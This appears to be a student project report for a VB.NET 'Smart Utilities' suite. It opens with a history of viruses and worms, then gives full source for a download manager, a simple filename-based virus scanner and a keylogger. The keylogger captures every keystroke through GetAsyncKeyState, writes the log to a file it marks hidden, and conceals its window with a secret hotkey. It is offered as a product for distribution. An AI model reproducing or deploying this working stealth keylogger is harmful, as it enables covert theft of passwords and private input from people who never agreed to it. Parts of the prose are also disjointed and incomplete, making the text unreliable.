final project _smart utilities

Post on 07-Jan-2017






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Smart Utilities






PS/2011/050 T.A.D.C ERANGA

PS/2011/336 O.V.H PERERA

PS/2011/001 S.A.C.K ABEYKOON


When we deal with the day-to-day work that we do using our desktop computers , laptop computers or even with our smart phones, one issue that all of us face is the negative effects of viruses and malware. This becomes a huge issue as the viruses does not allow us to do our peacefully, sometime by making the computer slow, or even by opening some unwanted applications & etc.

Computer viruses do not appear spontaneously; an attacker must introduce one to the targeted computer system, usually by persuading, or tricking, someone with legitimate access into placing the virus on the system. This can readily be done using a Trojan horse, a program which performs a stated function while performing another, unstated and usually undesirable one.3 For example, suppose a file used to boot a microcomputer contains a Trojan horse designed to erase a disk. When the microcomputer boots, it will execute the Trojan horse, which would erase the disk. Here, the overt function is to provide a basic operating system; the covert function is to erase the disk.

The concept of a key logger, although it’s popular with the IT folk and the corporate sector IT consumers, it is not that popular with the individual and private users of computers. But this can be very important for any type of user regarding security aspect and also the convenience it could bring when it comes to backing up the information.

We wanted to prepare a software that will become popular with both private users and the corporate & public users will be interested in using it, which will enable us to earn considerable funds from the increased sale of our software and invest in R&D to improve what we can offer to the market. We have discussed with several IT industry professionals and understood that although Virus Guards are popular with users but the Key Loggers are not that popular.

We had to find a solution or a method make sure that our project will be popular with both private and corporate folk.

The Introduction

One of the earliest documented replicating Trojan horses was a version of the game program animal which when played created another copy of itself. A later version deleted one copy of the first version, and then created two additional copies of itself. Because it spread even more rapidly than the first version, this later program supplanted the first entirely. After a preset date, whenever anyone played the second version, it deleted itself after the game ended [4].

Ken Thompson created a far more subtle replicating Trojan horse when he rigged a compiler to break login security [10][12]. When the compiler compiled the login program, it would secretly insert instructions to cause the resulting executable program to accept a fixed, secret password as well as a user’s real password. Also, when compiling the compiler, the Trojan horse would insert commands to modify the login command into the resulting executable compiler. Thompson then compiled the compiler, deleted the new source, and reinstalled the old source. Since it showed no traces of being doctored, anyone examining the source would conclude the compiler was safe. Fortunately, Thompson took some pains to ensure that it did not spread further, and it was finally deleted when someone copied another version of the executable compiler over the sabotaged one. Thompson’s point was that “no amount of source-level verification or scrutiny will protect you from using untrusted code” ([12], p. 763), which bears remembering, especially given the reliance of many security techniques relying on humans certifying programs to be free of malicious logic.

In 1983, Fred Cohen designed a computer virus to acquire privileges on a VAX-11/750 running UNIX; he obtained all system rights within half an hour on the average, the longest time being an hour, and the least being under 5 minutes. Because the virus did not degrade response time noticeably, most users never knew the system was under attack. In 1984 an experiment involving a UNIVAC 1108 showed that viruses could spread throughout that system too. Viruses were also written for other systems (TOPS-205, VAX/VMS, and a VM/3706system) but testing their effectiveness was forbidden. Cohen’s experiments indicated that the security mechanisms of those systems did little if anything to inhibit computer virus propagation [5][6].

In 1987, Tom Duff experimented on UNIX systems with a small virus that copied itself into executable files. The virus was not particularly virulent, but when Duff placed 48 infected programs on the most heavily used machine in the computing center, the virus spread to 46 different systems and infected 466 files, including at least one system program on each computer system, within eight days. Duff did not violate the security mechanisms in any way when he seeded the original 48 programs . By writing another virus in a language used by a command interpreter common to most UNIX systems, he disproved a common fallacy [5] that computer viruses are intrinsically machine dependent, and cannot spread to systems of varying architectures.


On November 2, 1988, a program combining elements of a computer worm and a computer virus targeting Berkeley and Sun UNIX-based computers entered the Internet; within hours, it had rendered several thousand computers unusable. Among other techniques, this program used a virus-like attack to spread: it inserted some instructions into a running process on the target machine and arranged for those instructions to be executed. To recover, these machines had to be disconnected from the network, rebooted, and several critical programs changed and recompiled to prevent re-infection. Worse, the only way to determine if the program had other malicious side effects (such as deleting files) was to disassemble it. Fortunately, its only purpose turned out to be to propagate. Infected sites were extremely lucky that the worm7 did not infect a system program with a virus designed to delete files, or did not attempt to damage attacked systems. Since then, there have been several incidents involving worms.

In general, though, computer viruses and replicating Trojan horses have been laboratory experiments rather than attacks from malicious or careless users. This raises a question of risk analysis: do the benefits gained in defending against computer viruses offset the costs of recovery and the likelihood of being attacked?

As worded, the above question implies that the mechanisms defending against computer viruses are useful only against computer viruses. However, computer viruses use techniques that are also used in other methods of attack, such as scavenging8, as well as by other forms of malicious logic. Defenses which strengthen access controls to prevent illicit access, or which prevent or detect the alteration of other files, also limit, prevent, or detect these other attacks as well. So, a more appropriate question is whether the benefits gained in defending against all such attacks offset the costs of recovery and the likelihood of being attacked.

Because this paper focuses primarily on computer viruses, we shall not delve into the history of computer security or malicious logic in general. Suffice it to say that the vulnerability of computer systems to such attacks is well known, and attacks on computer systems are common enough for descriptions of such incidents) that the use of mechanisms to inhibit them is generally agreed to be worthwhile.

The effectiveness of any security mechanism depends upon the security of the underlying base on which the mechanism is implemented, and the correctness of the necessary checking done at each step. If the trust in the base or in the checking is misplaced the mechanism will not be secure. Thus “secure” is a relative notion, as is “trust,” and mechanisms to enhance computer security attempt to balance the cost of the mechanism with the level of security desired and the degree of trust in the base that the site accepts as reasonable. Research dealing with malicious logic assumes the interface, software, and/or hardware used to implement the proposed scheme performs exactly as desired, meaning the trust is in the underlying computing base, the implementation, and (if done) the verification.

Current research uses specific properties of computer viruses to detect and limit their effects. Because of the fundamental nature of these properties, these defenses work equally well against most other forms of malicious logic.

Software Development Process

Download Manager

Public Class DownloadManager Dim DLocation As String Dim wc As New WebClient Public Sub Button1_Click(sender As System.Object, e As System.EventArgs) Handles cmdDownload.Click If txtSourceURL.Text = "" Or txtDestinationPath.Text = "" Then MsgBox("Please fill in the missing fields.", MsgBoxStyle.Exclamation) Else AddHandler wc.DownloadProgressChanged, AddressOf DownloadProgressChanged DLocation = txtDestinationPath.Text cmdAbort.Enabled = True cmdDownload.Enabled = False lstDownloadHistory.Items.Add(txtDestinationPath.Text) wc.DownloadFileAsync(New System.Uri(txtSourceURL.Text), DLocation) Timer1.Start() End If End Sub

Public Sub DownloadProgressChanged(sender As Object, e As DownloadProgressChangedEventArgs) ProgressBar1.Value = e.ProgressPercentage Label1.Text = e.BytesReceived & " | " & e.TotalBytesToReceive Label4.Text = e.ProgressPercentage & "%" Label1.Left = Me.ClientSize.Width \ 2 - Me.Label1.Width \ 2 End Sub

Private Sub Button2_Click(sender As Object, e As EventArgs) Handles cmdBrowse.Click SaveFileDialog1.ShowDialog() End Sub

Private Sub SaveFileDialog1_FileOk(sender As Object, e As System.ComponentModel.CancelEventArgs) Handles SaveFileDialog1.FileOk txtDestinationPath.Text = SaveFileDialog1.FileName + System.IO.Path.GetExtension(txtSourceURL.Text) End Sub

Private Sub Button3_Click(sender As Object, e As EventArgs) Handles cmdAbort.Click wc.CancelAsync() MessageBox.Show("Download aborted!") cmdAbort.Enabled = False cmdDownload.Enabled = True End Sub

Private Sub Timer1_Tick(sender As Object, e As EventArgs) Handles Timer1.Tick If ProgressBar1.Value = 100 Then ProgressBar1.Value = 0

Software Algorithm

My.Computer.Audio.Play(My.Resources.complete, AudioPlayMode.Background) MessageBox.Show("Download completed successfully.") cmdAbort.Enabled = False cmdDownload.Enabled = True Timer1.Stop() End If End Sub

Private Sub ListBox1_SelectedIndexChanged(sender As Object, e As EventArgs) Handles lstDownloadHistory.SelectedIndexChanged Try Process.Start(lstDownloadHistory.SelectedItem) Catch ex As Exception MessageBox.Show("The selected file is no longer available.") End Try End Sub

Private Sub DownloadManager_Load(sender As Object, e As EventArgs) Handles MyBase.Load Label1.BackColor = Color.Transparent Label5.BackColor = Color.Transparent txtDestinationPath.BackColor = Color.Transparent txtSourceURL.BackColor = Color.Transparent End SubEnd Class

Virus Detector

Public Class AntiVirus Dim percent = 0 Dim red

Private Sub Timer1_Tick(sender As Object, e As EventArgs) Handles Timer1.Tick percent = (ListBox2.Items.Count / lstVirusDefinition.Items.Count) * 100 If (lstVirusDefinition.SelectedIndex < lstVirusDefinition.Items.Count - 1) Then ProgressBar1.Value = percent

Label2.Text = "Scanning For : " & lstVirusDefinition.SelectedItem ListBox2.Items.Add("Scanning: " & lstVirusDefinition.SelectedItem) Try If Dir(lstVirusDefinition.SelectedItem.ToString) <> "" Then lstVirusDetected.Items.Add("Threat Found : " & lstVirusDefinition.SelectedItem.ToString) ElseIf Dir(lstVirusDefinition.SelectedItem.ToString, FileAttribute.Hidden ) <> "" Then lstVirusDetected.Items.Add("Threat Found : " & lstVirusDefinition.SelectedItem.ToString) End If Catch ex As Exception

End Try lstVirusDefinition.SelectedIndex += 1 Else If lstVirusDetected.Items.Count - 1 >= 1 Then lstVirusDetected.SelectedIndex = 0 btnDelete.Enabled = True

End If Timer1.Stop() ProgressBar1.Value = 100 Label2.Text = "Finished Scanning. " & lstVirusDetected.Items.Count & " Threats Found!" btnStop.Enabled = False btnStart.Enabled = True

End If End Sub

Private Sub Form1_Load(sender As Object, e As EventArgs) Handles MyBase.Load btnStart.Enabled = False btnStop.Enabled = False btnDelete.Enabled = False cmbDirectory.SelectedIndex = 0 cmbDirectory.Items.AddRange(System.IO.Directory.GetLogicalDrives) txtVirus.Hide() lblDatabase.BackColor = Color.Transparent Label2.BackColor = Color.Transparent Me.lstVirusDefinition.BackColor = Me.lstVirusDefinition.Parent.BackColor ' lstVirusDefinition.BackColor = Color.Transparent 'lstVirusDetected.BackColor = Color.Transparent End Sub

Private Sub btnStart_Click(sender As Object, e As EventArgs) Handles btnStart.Click ProgressBar1.Value = 0 ListBox2.Items.Clear() lstVirusDetected.Items.Clear() percent = 0 btnStart.Enabled = False lstVirusDefinition.SelectedIndex = 0 Timer1.Start() btnStop.Enabled = True btnDelete.Enabled = True End Sub

Private Sub cmbDirectory_SelectedIndexChanged(sender As Object, e As EventArgs) Handles cmbDirectory.SelectedIndexChanged If cmbDirectory.SelectedIndex >= 1 Then lstVirusDefinition.Items.Clear() txtVirus.Text = My.Resources.virusList.ToString For Each line As String In txtVirus.Lines lstVirusDefinition.Items.Add(cmbDirectory.SelectedItem.ToString & line.ToString) Next If lstVirusDefinition.Items.Count - 1 >= 0 Then lblDatabase.Text = "Database Loaded!" btnStart.Enabled = True Else lblDatabase.Text = "No Database Loaded!" btnStart.Enabled = False

End If Else btnStart.Enabled = False lstVirusDefinition.Items.Clear()

txtVirus.Text = "" lblDatabase.Text = "No Database Loaded!" End If End Sub

Private Sub lblDatabase_TextChanged(sender As Object, e As EventArgs) Handles lblDatabase.TextChanged If lblDatabase.Text = "Database Loaded!" Then btnStart.Enabled = True Else btnStart.Enabled = False End If End Sub

Private Sub btnDelete_Click(sender As Object, e As EventArgs) Handles btnDelete.Click Dim vpath As String = Application.StartupPath & "\virusList.txt" MsgBox(vpath)

red = Replace(lstVirusDetected.SelectedItem.ToString, "Threat Found : ", "") Try System.IO.File.Delete(red) If Dir(red) <> "" Then MsgBox("Unable to Delete " & red, MsgBoxStyle.Critical) Else MsgBox("File " & red & " successfully Deleted!", MsgBoxStyle.Critical) lstVirusDetected.Items.Remove(lstVirusDetected.SelectedItem)

End If Catch ex As Exception

End Try End Sub

Private Sub btnStop_Click(sender As Object, e As EventArgs) Handles btnStop.Click Timer1.Stop() If lstVirusDetected.Items.Count - 1 >= 0 Then lstVirusDetected.SelectedIndex = 0 btnDelete.Enabled = True End If btnStop.Enabled = False btnStart.Enabled = True End Sub

Private Sub lstVirusDetected_SelectedIndexChanged(sender As Object, e As EventArgs) Handles lstVirusDetected.SelectedIndexChanged If lstVirusDetected.Items.Count - 1 >= 0 Then lstVirusDetected.Enabled = True Else btnDelete.Enabled = False End If End Sub

Private Sub lstVirusDetected_SelectedValueChanged(sender As Object, e As EventArgs) Handles lstVirusDetected.SelectedValueChanged If lstVirusDetected.Items.Count - 1 >= 0 Then lstVirusDetected.Enabled = True Else btnDelete.Enabled = False End If

End Sub

Private Sub Label2_Click(sender As Object, e As EventArgs)

End SubEnd Class

Key Logger

' librariesImports System.Runtime.InteropServicesImports System.ThreadingImports System.IO

Public Class frmKeylogger ' declarations Dim buffer As New List(Of String) Dim buffercat As String Dim stagingpoint As String Dim actual As String Dim initlog As Boolean = False Dim log As StreamWriter

' threading Public thread_scan As Thread Public thread_hide As Thread

' thread-safe calling for thread_hide Delegate Sub Change() Dim objchange As New Change(AddressOf DoHide)

Private Sub frmKeyRogger_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load Me.Text = "Advanced Key Logger" lblTitle1.Text = "Smart" lblTitle2.Text = "KeyLogger" lblAbout.Text = "Event List"

GroupBox1.Text = "Control Panel" cmdBegin.Text = "" cmdEnd.Text = "" cmdEnd.Enabled = False cmdClear.Text = ""

'initiate hide thread thread_hide = New Thread(AddressOf HideIt) thread_hide.IsBackground = True thread_hide.Start()

status.Text = "Ready" End Sub

' write out keystroke log to file on close event Private Sub frmKeyRogger_Closed(ByVal sender As Object, ByVal e As System.EventArgs) Handles MyBase.Closed Call WriteOut()

End Sub

' getkey, API call to USER32.DLL <DllImport("USER32.DLL", EntryPoint:="GetAsyncKeyState", SetLastError:=True, CharSet:=CharSet.Unicode, ExactSpelling:=True, CallingConvention:=CallingConvention.StdCall)> Public Shared Function getkey(ByVal Vkey As Integer) As Boolean End Function

Private Sub cmdBegin_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles cmdBegin.Click

thread_scan = New Thread(AddressOf Scan) thread_scan.IsBackground = True thread_scan.Start() cmdBegin.Enabled = False

If chkFile.Checked = True Then Try log = New StreamWriter(OpenFileDialog.FileName, True) Catch MsgBox("Could not open file for writing. Perhaps it is read only, non-existant, or you lack necessary privileges to access it?") End Try End If

status.Text = "Logging keystrokes..."

cmdEnd.Enabled = True End Sub

' checks for keypresses with delay, upon detection of pressed key, calls AddToBuffer Public Sub Scan() Dim foo As Integer While 1

For foo = 1 To 93 Step 1 If getkey(foo) Then AddtoBuffer(foo, getkey(16)) End If Next

For foo = 186 To 192 Step 1 If getkey(foo) Then AddtoBuffer(foo, getkey(16)) End If Next

BufferToOutput() buffer.Clear()

Thread.Sleep(120) SetText(stagingpoint) End While End Sub

' parses keycode and saves to buffer to be written Public Sub AddtoBuffer(ByVal foo As Integer, ByVal modifier As Boolean)

If Not (foo = 1 Or foo = 2 Or foo = 8 Or foo = 9 Or foo = 13 Or (foo >= 17 And foo <= 20) Or foo = 27 Or (foo >= 32 And foo <= 40) Or (foo >= 44 And foo <= 57) Or (foo >= 65 And foo <= 93) Or (foo >= 186 And foo <= 192)) Then Exit Sub End If

Select Case foo Case 48 To 57 If modifier Then Select Case foo Case 48 actual = ")" Case 49 actual = "!" Case 50 actual = "@" Case 51 actual = "#" Case 52 actual = "$" Case 53 actual = "%" Case 54 actual = "^" Case 55 actual = "&" Case 56 actual = "*" Case 57 actual = "(" End Select Else actual = Convert.ToChar(foo) End If Case 65 To 90 If modifier Then actual = Convert.ToChar(foo) Else actual = Convert.ToChar(foo + 32) End If Case 1 'actual = "<LCLICK>" actual = "" Case 2 actual = "<RCLICK>" Case 8 actual = "<BACKSPACE>" Case 9 actual = "<TAB>" Case 13 actual = "<ENTER>" Case 17 actual = "<CTRL>" Case 18 actual = "<ALT>" Case 19 actual = "<PAUSE>" Case 20 actual = "<CAPSLOCK>" Case 27 actual = "<ESC>" Case 32

actual = " " Case 33 actual = "<PAGEUP>" Case 34 actual = "<PAGEDOWN>" Case 35 actual = "<END>" Case 36 actual = "<HOME>" Case 37 actual = "<LEFT>" Case 38 actual = "<UP>" Case 39 actual = "<RIGHT>" Case 40 actual = "<DOWN>" Case 44 actual = "<PRNTSCRN>" Case 45 actual = "<INSERT>" Case 46 actual = "<DEL>" Case 47 actual = "<HELP>" Case 186 If modifier Then actual = ":" Else actual = ";" End If actual = ";"

Case 187 If modifier Then actual = "+" Else actual = "=" End If Case 188 If modifier Then actual = "<" Else actual = "," End If Case 189 If modifier Then actual = "_" Else actual = "-" End If Case 190 If modifier Then actual = ">" Else actual = "." End If Case 191 If modifier Then actual = "?" Else actual = "/" End If

Case 192 If modifier Then actual = "~" Else actual = "`" End If End Select

If buffer.Count <> 0 Then Dim bar As Integer = 0 While bar < buffer.Count If buffer(bar) = actual Then Exit Sub End If bar += 1 End While End If


End Sub

' writes buffer to output box Public Sub BufferToOutput() If buffer.Count <> 0 Then Dim qux As Integer = 0 While qux < buffer.Count buffercat = buffercat & buffer(qux) qux += 1 End While 'SetText(txtOutput.Text & buffercat) stagingpoint = stagingpoint & buffercat buffercat = String.Empty End If End Sub

Delegate Sub SetTextCallback(ByVal [text] As String)

' thread safe call to output text to output box Private Sub SetText(ByVal [text] As String) If txtOutput.InvokeRequired Then Dim d As New SetTextCallback(AddressOf SetText) Me.Invoke(d, New Object() {[text]}) Else txtOutput.Text = [text] End If End Sub

Private Sub cmdEnd_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles cmdEnd.Click thread_scan.Abort() buffer.Clear() cmdBegin.Enabled = True cmdEnd.Enabled = False Call WriteOut() status.Text = "Stopped logging." End Sub

Private Sub cmdClear_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles cmdClear.Click txtOutput.Clear() stagingpoint = String.Empty

End Sub

Private Sub frmKeyRogger_Resize(ByVal sender As Object, ByVal e As System.EventArgs) Handles Me.Resize If Me.WindowState = FormWindowState.Minimized Then Me.Hide() End If End Sub

Public Sub WriteOut() If chkFile.Checked = False Then Exit Sub End If Dim tm As System.DateTime tm = Now

Try log.WriteLine(vbNewLine) Catch log = New StreamWriter(OpenFileDialog.FileName, True) End Try log.WriteLine(tm) If stagingpoint <> Nothing Then log.WriteLine(stagingpoint) End If log.WriteLine(vbNewLine) log.Flush() log.Close()

'hides file/sets as hidden File.SetAttributes(OpenFileDialog.FileName, FileAttributes.Hidden) End Sub

' ctrl+shift+s toggles hide form Public Sub HideIt() While 1 If getkey(17) And getkey(160) And getkey(83) Then Me.Invoke(objchange) End If Thread.Sleep(200) End While End Sub

Public Sub DoHide() If Me.Visible = True Then Me.Visible = False Else Me.Visible = True End If End Sub

Private Sub chkFile_CheckedChanged(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles chkFile.CheckedChanged If chkFile.Checked = True Then OpenFileDialog.ShowDialog() End If End Sub

Private Sub lblTitle1_Click(sender As Object, e As EventArgs) Handles lblTitle1.Click

End Sub

Private Sub lblTitle1_Click_1(sender As Object, e As EventArgs) Handles lblTitle1.Click

End Sub

Private Sub GroupBox1_Enter(sender As Object, e As EventArgs) Handles GroupBox1.Enter

End Sub

Private Sub lblTitle2_Click(sender As Object, e As EventArgs) Handles lblTitle2.Click

End SubEnd Class

Software testing is an investigation conducted to provide stakeholders with information about the quality of the product or service under test. Software testing can also provide an objective, independent view of the software to allow the business to appreciate and understand the risks of software implementation. Test techniques include the process of executing a program or application with the intent of finding software bugs (errors or other defects).

Software testing involves the execution of a software component or system component to evaluate one or more properties of interest. In general, these properties indicate the extent to which the component or system under test:

meets the requirements that guided its design and development, responds correctly to all kinds of inputs, performs its functions within an acceptable time, is sufficiently usable, can be installed and run in its intended environments, and achieves the general result its stakeholder’s desire.

As the number of possible tests for even simple software components is practically infinite, all software testing uses some strategy to select tests that are feasible for the available time and resources. As a result, software testing typically (but not exclusively) attempts to execute a program or application with the intent of finding software bugs (errors or other defects). The job of testing is an iterative process as when one bug is fixed, it jerry can illuminate other, deeper bugs, or can even create new ones.

Software testing can provide objective, independent information about the quality of software and risk of its failure to users and/or sponsors.

Not all software defects are caused by coding errors. One common source of expensive defects is requirement gaps, e.g., unrecognized requirements which result in errors of omission by the program designer.Requirement gaps can often be non-functional

Software Testing

requirements such as testability, scalability, maintainability, usability, performance, andsecurity.

Software faults occur through the following processes. A programmer makes an error (mistake), which results in a defect (fault, bug) in the software source code. If this defect is executed, in certain situations the system will produce wrong results, causing a failure. Not all defects will necessarily result in failures. For example, defects in dead code will never result in failures. A defect can turn into a failure when the environment is changed. Examples of these changes in environment include the software being run on a newcomputer hardware platform, alterations in source data, or interacting with different software. A single defect may result in a wide range of failure symptoms.

The project enabled a lot of people who are both individual and corporate to experience a light software package that combined a virus detector, a key logger and a very useful .

The rapid advancement in VN.Net technologies have given rise to new applications that were

impossible just few years ago. One of these applications is Smart Utilities. It is because when

considering about virus detecting, Advanced download manager and Key Logger. This

document defines details the requirements, design and implementation of a accurate and well

functioning application


Investing more in to R&D side of the project to develop a software package which is more light weight

Promoting the features of the software package to outside to start distributing commercially

Conducting public research to find how users like the features of the roject

The Next Step

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